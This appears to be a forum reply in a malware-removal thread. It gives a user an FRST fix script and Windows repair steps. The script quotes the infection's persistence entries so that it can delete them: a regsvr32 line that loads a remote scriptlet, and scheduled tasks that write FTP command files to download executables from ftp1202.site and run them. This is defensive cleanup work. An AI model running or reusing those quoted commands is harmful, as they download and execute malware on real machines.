Select the following code and copy it to the clipboard:
[CODE]
Start::
CreateRestorePoint:
CloseProcesses:
HKLM-x32\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.ftp1202.site:280/v.sct scrobj.dll <==== ATTENTION
HKLM\ DisallowedCertificates: 1990649205B55EAB5D692E9EDB1BE0DDD3B037DE (U)
HKLM\ DisallowedCertificates: 3AD010247A8F1E991F8DDE5D47989CB5202E5614 (U)
HKLM\ DisallowedCertificates: 6A2C691767C2F1999B8C020CBAB44756A99A0C41 (U)
HKLM\ DisallowedCertificates: 6B6FA65B1BDC2A0F3A7E66B590F93297B8EB56B9 (U)
HKLM\ DisallowedCertificates: 8835437D387BBB1B58FF5A0FF8D003D8FE04AED4 (U)
HKLM\ DisallowedCertificates: 9FEB091E053D1C453C789E8E9C446D31CB177ED9 (U)
HKLM\ DisallowedCertificates: C597D4E7FF9CE5BD3EC321C11827FCA9294A6BA1 (U)
HKLM\ DisallowedCertificates: D3FD325D0F2259F693DD789430E3A9430BB59B98 (U)
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\Run: [Browser Manager] => C:\Users\User\AppData\Local\Yandex\BrowserManager\MBLauncher.exe [130056 2018-08-16] (YANDEX LLC -> Yandex LLC)
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\MountPoints2: {237ebabd-4be2-11e8-9862-bc5ff4d36f82} - K:\AutoRun.exe
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\MountPoints2: {237ebabf-4be2-11e8-9862-bc5ff4d36f82} - K:\AutoRun.exe
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\MountPoints2: {bfa14c95-825c-11e6-a0a3-bc5ff4d36f82} - K:\setup.exe
HKU\S-1-5-21-336028783-3233290375-1713493059-1000\...\MountPoints2: {cec4dfa5-6333-11e9-9d57-bc5ff4d36f82} - E:\HiSuiteDownLoader.exe
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{104AA62D-D285-4BF9-87ED-CC68F20CDD0F}] -> C:\Program Files (x86)\Amazon\Amazon Assistant\AmazonAssistantTaskbar.exe /pin:
HKLM\Software\...\Authentication\Credential Providers: [{B7724AE5-1135-4889-8A5F-CA98BE6CA1ED}] -> C:\Program Files\McAfee\TrueKey\McAfee.TrueKey.CredentialProvider.dll
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter "C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter" "C:\Program Files\McAfee\TrueKey\McAfeeTrueKeyPasswordFilter"
Task: {0DF439B1-1377-4D5F-9B1B-A1D4ED3C7AD8} - System32\Tasks\Mysa2 => cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION
Task: {1FA2B18F-2A07-4556-B815-6CCE4F14943F} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {71FE4996-54D4-401A-B9D7-9CF45855DEB2} - System32\Tasks\oka => cmd /c start c:\windows\inf\aspnet\lsma12.exe
Task: {7E9E2E83-506B-43FD-9531-FE544F251AD2} - System32\Tasks\Mysa => cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION
Task: {A543F880-A2C8-40B5-9823-AA507061F936} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {AF828AD3-B91B-42FE-9D1B-93CB681242E5} - System32\Tasks\Mysa3 => cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION
BHO: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie64.dll => No File
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie.dll => No File
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\ssv.dll => No File
Toolbar: HKLM - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie64.dll No File
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie.dll No File
Toolbar: HKU\S-1-5-21-336028783-3233290375-1713493059-1000 -> True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\McAfee\TrueKey\MSIE\truekey_ie64.dll No File
FF Plugin-x32: @java.com/DTPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\dtplugin\npDeployJava1.dll [No File]
FF Plugin-x32: @java.com/JavaPlugin,version=11.151.2 -> C:\Program Files (x86)\Java\jre1.8.0_151\bin\plugin2\npjp2.dll [No File]
S4 TrueKey; "C:\Program Files\McAfee\TrueKey\McAfee.TrueKey.Service.exe" [X]
S4 TrueKeyScheduler; "C:\Program Files\McAfee\TrueKey\McTkSchedulerService.exe" [X]
S4 TrueKeyServiceHelper; "C:\Program Files\McAfee\TrueKey\McAfee.TrueKey.ServiceHelper.exe" [X]
S2 aow_drv; \??\G:\Games\PUBG\TxGameAssistant\UI\aow_drv_x64.sys [X]
2020-04-06 00:19 - 2020-04-06 00:19 - 000000000 _____ C:\Windows\system32\Tmp5466.tmp
2020-04-05 21:09 - 2020-04-05 21:09 - 000000000 _____ C:\Windows\system32\Tmp6E7A.tmp
2020-04-05 21:04 - 2020-04-05 21:04 - 000000000 _____ C:\Windows\system32\Tmp445F.tmp
2020-04-05 21:00 - 2020-04-05 21:00 - 000000000 _____ C:\Windows\system32\Tmp581D.tmp
2020-04-05 21:00 - 2020-04-05 21:00 - 000000000 _____ C:\Windows\system32\Tmp5781.tmp
2020-04-05 20:55 - 2020-04-05 20:55 - 000000000 _____ C:\Windows\system32\Tmp533D.tmp
2020-04-05 20:55 - 2020-04-05 20:55 - 000000000 _____ C:\Windows\system32\Tmp4845.tmp
2020-04-05 20:52 - 2020-04-05 20:52 - 000000000 _____ C:\Windows\system32\Tmp48B2.tmp
2020-04-05 20:33 - 2020-04-05 20:33 - 000000000 _____ C:\Windows\system32\Tmp515A.tmp
2020-04-05 20:33 - 2020-04-05 20:33 - 000000000 _____ C:\Windows\system32\Tmp4539.tmp
2020-04-05 20:29 - 2020-04-05 20:29 - 000000000 _____ C:\Windows\system32\Tmp4BBE.tmp
2020-04-05 19:17 - 2020-04-05 19:17 - 000000000 _____ C:\Windows\system32\Tmp6872.tmp
2020-04-05 19:17 - 2020-04-05 19:17 - 000000000 _____ C:\Windows\system32\Tmp5955.tmp
2020-04-05 19:08 - 2020-04-05 19:08 - 000000000 _____ C:\Windows\system32\Tmp6AA4.tmp
2020-04-05 16:00 - 2020-04-05 16:00 - 000000000 _____ C:\Windows\system32\TmpF823.tmp
2020-04-05 16:00 - 2020-04-05 16:00 - 000000000 _____ C:\Windows\system32\TmpECFC.tmp
2020-04-05 15:56 - 2020-04-05 15:56 - 000000000 _____ C:\Windows\system32\TmpEE92.tmp
2020-04-05 15:06 - 2020-04-05 15:06 - 000000000 _____ C:\Windows\system32\Tmp4864.tmp
2020-04-05 15:06 - 2020-04-05 15:06 - 000000000 _____ C:\Windows\system32\Tmp45C6.tmp
2020-04-05 13:01 - 2020-04-05 13:01 - 000000000 _____ C:\Windows\system32\Tmp5179.tmp
2020-04-05 13:01 - 2020-04-05 13:01 - 000000000 _____ C:\Windows\system32\Tmp451A.tmp
2020-04-05 12:57 - 2020-04-05 12:57 - 000002355 _____ C:\Users\User\Desktop\AdwCleaner.rar
2020-04-05 12:56 - 2020-04-05 12:56 - 000000000 _____ C:\Windows\system32\Tmp4402.tmp
2020-04-05 12:55 - 2020-04-05 12:55 - 000000290 _____ C:\Windows\Tasks\AdwCleaner_onReboot.job
2020-04-05 12:52 - 2020-04-05 12:55 - 000000000 ____D C:\AdwCleaner
2020-04-05 12:24 - 2020-04-05 12:24 - 000000000 _____ C:\Windows\system32\Tmp59D3.tmp
2020-04-05 12:10 - 2020-04-05 12:10 - 000000000 _____ C:\Windows\system32\Tmp3938.tmp
2020-04-05 12:01 - 2020-04-05 12:01 - 000000000 _____ C:\Windows\system32\Tmp46EE.tmp
2020-04-05 12:01 - 2020-04-05 12:01 - 000000000 _____ C:\Windows\system32\Tmp448E.tmp
2020-04-05 11:41 - 2020-04-05 11:41 - 000000000 _____ C:\Windows\system32\Tmp47F7.tmp
2020-04-05 11:41 - 2020-04-05 11:41 - 000000000 _____ C:\Windows\system32\Tmp44FB.tmp
2020-04-05 11:37 - 2020-04-05 11:37 - 000000000 _____ C:\Windows\system32\Tmp402A.tmp
2020-04-05 11:37 - 2020-04-05 11:37 - 000000000 _____ C:\Windows\system32\Tmp3F8E.tmp
2020-04-05 10:03 - 2020-04-05 10:03 - 000000000 _____ C:\Windows\system32\Tmp3BF6.tmp
2020-04-05 09:51 - 2020-04-05 09:51 - 000000000 _____ C:\Windows\system32\Tmp5F2F.tmp
2020-04-05 09:51 - 2020-04-05 09:51 - 000000000 _____ C:\Windows\system32\Tmp4874.tmp
2020-04-05 09:43 - 2020-04-05 09:43 - 000000000 _____ C:\Windows\system32\Tmp3706.tmp
2020-04-05 09:43 - 2020-04-05 09:43 - 000000000 _____ C:\Windows\system32\Tmp364B.tmp
2020-04-05 09:31 - 2020-04-05 09:31 - 000000000 _____ C:\Windows\system32\Tmp5659.tmp
2020-04-05 09:23 - 2020-04-05 09:23 - 000000000 _____ C:\Windows\system32\Tmp3A22.tmp
2020-04-05 07:51 - 2020-04-05 07:51 - 000000000 _____ C:\Windows\system32\Tmp4401.tmp
2020-04-05 07:51 - 2020-04-05 07:51 - 000000000 _____ C:\Windows\system32\Tmp4365.tmp
2020-04-05 00:24 - 2020-04-05 00:24 - 000000000 _____ C:\Windows\system32\Tmp42E8.tmp
2020-04-05 00:24 - 2020-04-05 00:24 - 000000000 _____ C:\Windows\system32\Tmp3ED3.tmp
2020-04-05 00:17 - 2020-04-06 00:19 - 000000081 _____ C:\Windows\system32\s
2020-04-05 00:17 - 2020-04-06 00:19 - 000000079 _____ C:\Windows\system32\ps
2020-04-05 00:17 - 2020-04-06 00:19 - 000000077 _____ C:\Windows\system32\p
2020-04-05 00:17 - 2020-04-05 00:17 - 000000000 _____ C:\Windows\system32\Tmp4EAB.tmp
2020-04-04 18:53 - 2020-04-04 18:53 - 000000000 _____ C:\Windows\system32\Tmp6DBF.tmp
2020-04-04 18:09 - 2020-04-04 18:09 - 000000000 _____ C:\Windows\system32\Tmp58E8.tmp
2020-04-04 18:09 - 2020-04-04 18:09 - 000000000 _____ C:\Windows\system32\Tmp5782.tmp
2020-04-04 17:35 - 2020-04-05 19:40 - 000000000 ____D C:\KVRT_Data
2020-04-04 16:42 - 2020-04-04 16:42 - 000634189 _____ C:\Users\User\Desktop\quarantine.zip
2020-04-04 12:11 - 2020-04-04 12:11 - 000000000 _____ C:\Windows\system32\TmpAB7A.tmp
2020-04-04 12:11 - 2020-04-04 12:11 - 000000000 _____ C:\Windows\system32\Tmp9F2C.tmp
2017-12-29 22:36 - 2017-10-30 22:36 - 000000032 ____R () C:\ProgramData\hash.dat
017-09-26 14:50 - 2017-09-26 14:50 - 000000001 _RHOT () C:\Program Files (x86)\Amazon
2017-12-02 19:14 - 2012-09-01 19:03 - 000000144 _____ () C:\Users\User\AppData\Roaming\ACEConfigCache2.lst
2017-09-26 14:50 - 2017-09-26 14:50 - 000000001 _RHOT () C:\Users\User\AppData\Roaming\BrowserModule
2017-09-26 14:50 - 2017-09-26 14:50 - 000000001 _RHOT () C:\Users\User\AppData\Roaming\DriverAgentPlus
2017-09-26 14:50 C:\ProgramData\UBar
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Wargaming.net\Total War Arena\Удалить Total War Arena.lnk -> G:\Games\Total_War_Arena\wgc_api.exe (No File) <==== Cyrillic
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VkontakteDJ\Удалить программу.lnk -> C:\ProgramData\VkontakteDJ\uninstall.exe (No File) <==== Cyrillic
Shortcut: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Counter-Strike Global Offensive\Деинсталлировать.lnk -> G:\CS\Counter-Strike Global Offensive\Uninstall.exe (No File) <==== Cyrillic
AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
AlternateDataStreams: C:\ProgramData\Application Data:NT2 [658]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [434]
AlternateDataStreams: C:\Users\User\Application Data:77a575add9465d78c606d381e5f202fb [394]
MSCONFIG\Services: TrueKey => 2
MSCONFIG\Services: TrueKeyScheduler => 2
MSCONFIG\Services: TrueKeyServiceHelper => 2
MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe"
MSCONFIG\startupreg: USB Antivirus => C:\Program Files (x86)\USB Disk Security\USBGuard.exe
MSCONFIG\startupreg: USB Security => C:\Users\User\AppData\Roaming\Zbshareware Lab\USBGuard.exe
FirewallRules: [{AD9740CC-B546-47FA-B708-89B2F60A1390}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe No File
FirewallRules: [{3EACB996-3836-4E89-AED2-CD8D757769F2}] => (Allow) C:\Program Files (x86)\Samsung\Easy Document Creator\EDC.exe No File
FirewallRules: [{1A98BDB5-515F-4DDD-8236-55D98B519D58}] => (Allow) C:\Users\User\AppData\Local\GameCenter\GameCenter.exe No File
FirewallRules: [{BC1BDBF8-FA30-457A-B11A-C98D7E575490}] => (Allow) C:\Users\User\AppData\Local\GameCenter\GameCenter.exe No File
FirewallRules: [{DC0AD15D-CB07-4BDA-ACCA-97930542E926}] => (Block) LPort=445
FirewallRules: [{82EED667-D3F4-4141-9DD5-67E846546D48}] => (Block) LPort=139
Reboot:
End::
[/CODE]
Run FRST.EXE/FRST64.EXE, click [B]Fix[/B] once and wait. The program will create a log file ([B]Fixlog.txt[/B]). Attach it to your next message.
The computer will be restarted automatically.
Download [URL="http://www.tweaking.com/files/setups/tweaking.com_windows_repair_aio.zip"]Windows Repair (All In One)[/URL], unpack it, run it, go to "Jump To Repairs", "Open Repairs", and tick these items:
"Remove Temp Files"
"Repair Windows Updates"
"Restore Important Windows Services"
"Set Windows Services To Default Startup"
"Repair MSI (Windows Installer)"
and click "[B]Start Repairs[/B]".
Then try installing the update package, as I wrote in message #13.